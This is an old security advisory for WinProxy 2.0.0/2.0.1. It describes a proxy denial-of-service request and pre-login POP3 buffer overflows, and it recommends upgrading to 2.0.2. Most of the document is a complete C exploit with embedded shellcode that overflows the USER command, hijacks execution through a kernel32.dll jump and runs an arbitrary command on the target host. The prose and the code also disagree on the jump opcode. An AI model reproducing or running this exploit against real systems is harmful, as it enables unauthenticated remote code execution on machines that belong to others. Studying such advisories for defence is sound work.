Vulnerability WinProxy Affected WinProxy 2.0.0/2.0.1 Description Following is based on SPS Advisory #37. WinProxy is a freeware of Proxy, Mail, Web server software work on Windows95/98/NT/2000 and you can download from Japanese popular sites. WinProxy will be terminated caused by unexpected malicious request from remote. This is a kind of Buffer Overflow problem. Especially on POP3 service there are many Buffer Overflow vulnerabilities such as USER, PASS, LIST, RETR, DELE... etc. You may execute arbitrary code in your request strings on target host. This vulnerability will cause DoS or allow arbitrary code execute. DoS will be caused on HTTP Proxy. Arbitrary code execute will be caused on POP3 service. (1) HTTP Proxy Server DoS ========================= WinProxy will be terminated by following request on 8080 (default)... Offset Data -------------- 0 'G' 1 'E' 2 'T' 3 ' ' 4 '/' 5 ' ' 6 \r 7 \n Note: "\r\n" is the point. Example: %telnet 8080 %Connected to Escape character is '^]'. GET / (2) POP3 Server Exploitable Buffer Overflow =========================================== There are Buffer Overflow vulnerabilities in following commands.. USER PASS LIST RETR DELE Bad guy can execute arbitrary code that is put in malicious request. USER and PASS commands allow remote exploits without login procedure. It's dangerous thing, isn't it? Following is an example of USER command. Author of WinProxy prepared less than 300 byte for username string cup. If you put USER+username(315 byte), you'll see GPF dialog box(means page fault) on your screen. That will cause Buffer Overflow by over 312 byte strings. So, you can control EIP at exceptional handling by putting a address on offset 312. EAX at exceptional handling is offset308. So, you can let this jump to an address pointed in EAX by setting address offset312 on such as JMP EAX(0xff,0xe1) in kernel32.dll. You can skip exceptional handler address and execute code, if you put JMPS command on offset308-309. Following exploit code is for WinProxy on Windows98 from remote. Compiled by Visual C++5.0 and tested on Japanese Windows98. /*============================================================================= WinProxy 2.0.1 Overflow Exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include <stdio.h> #include <string.h> #include <windows.h> #include <winsock.h> #define PORT 110 #define MAXBUF 700 #define MAXPACKETBUF 32000 #define RETADR 312 #define JMPADR 308 #define CODEOFS 316 #define JMPEAX_1 0xff #define JMPEAX_2 0xe3 #define NOP 0x90 #define KERNEL_NAME "kernel32.dll" unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53, 0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23, 0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B, 0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,0x83, 0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,0x83, 0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF, 0xFF,0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit."; unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2){ adr=(unsigned int)p; if ((adr&0xff)==0) continue; if (((adr>>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int i,kp,ip,p1,p2,p; unsigned int pretadr; static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q; struct hostent *hs; MEMORY_BASIC_INFORMATION meminfo; if (argc<3){ printf("usage: %s VictimHost Command\n",argv[0]); exit(1); } if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){ printf("Can not find %s\n",KERNEL_NAME); exit(1); } VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); pretadr=0; for (i=0;i<meminfo.RegionSize;i++){ p=kp+i; if ( ( p &0xff)==0 || ((p>>8 )&0xff)==0 || ((p>>16)&0xff)==0 || ((p>>24)&0xff)==0) continue; if (*((unsigned char *)p)==JMPEAX_1 && *(((unsigned char *)p)+1)==JMPEAX_2) pretadr=p; } printf("RETADR : %x\n",pretadr); if (pretadr==0){ printf("Can not find codes which are used by exploit.\n"); exit(1); } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0; for (i=0;i<10;i++) memset(buf+300+i*10,0x40+i,10); ip=pretadr; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x06; buf[RETADR+6]=0xcd; buf[RETADR+7]=0x01; p1=(unsigned int)GetProcAddress((HINSTANCE)kp,"LoadLibraryA"); p2=(unsigned int)GetProcAddress((HINSTANCE)kp,"GetProcAddress"); printf("LoadLibraryA : %x\n",p1); printf("GetProcAddress : %x\n",p2); if ( ( p1 &0xff)==0 || ((p1>>8 )&0xff)==0 || ((p1>>16)&0xff)==0 || ((p1>>24)&0xff)==0 || ( p2 &0xff)==0 || ((p2>>8 )&0xff)==0 || ((p2>>16)&0xff)==0 || ((p2>>24)&0xff)==0){ printf("NULL code is included.\n"); exit(1); } strcat(cmdbuf,argv[2]); strcat(exploit_code,cmdbuf); exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x21]=exploit_code[0x35]=p2&0xff; exploit_code[0x22]=exploit_code[0x36]=(p2>>8)&0xff; exploit_code[0x23]=exploit_code[0x37]=(p2>>16)&0xff; exploit_code[0x24]=exploit_code[0x38]=(p2>>24)&0xff; exploit_code[0x41]=strlen(argv[2]); memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"user %s\r\n",buf); send(sock,packetbuf,strlen(packetbuf),0); Sleep(3000); closesocket(sock); printf("Done.\n"); return FALSE; } Solution Upgrade to WinProxy2.0.2.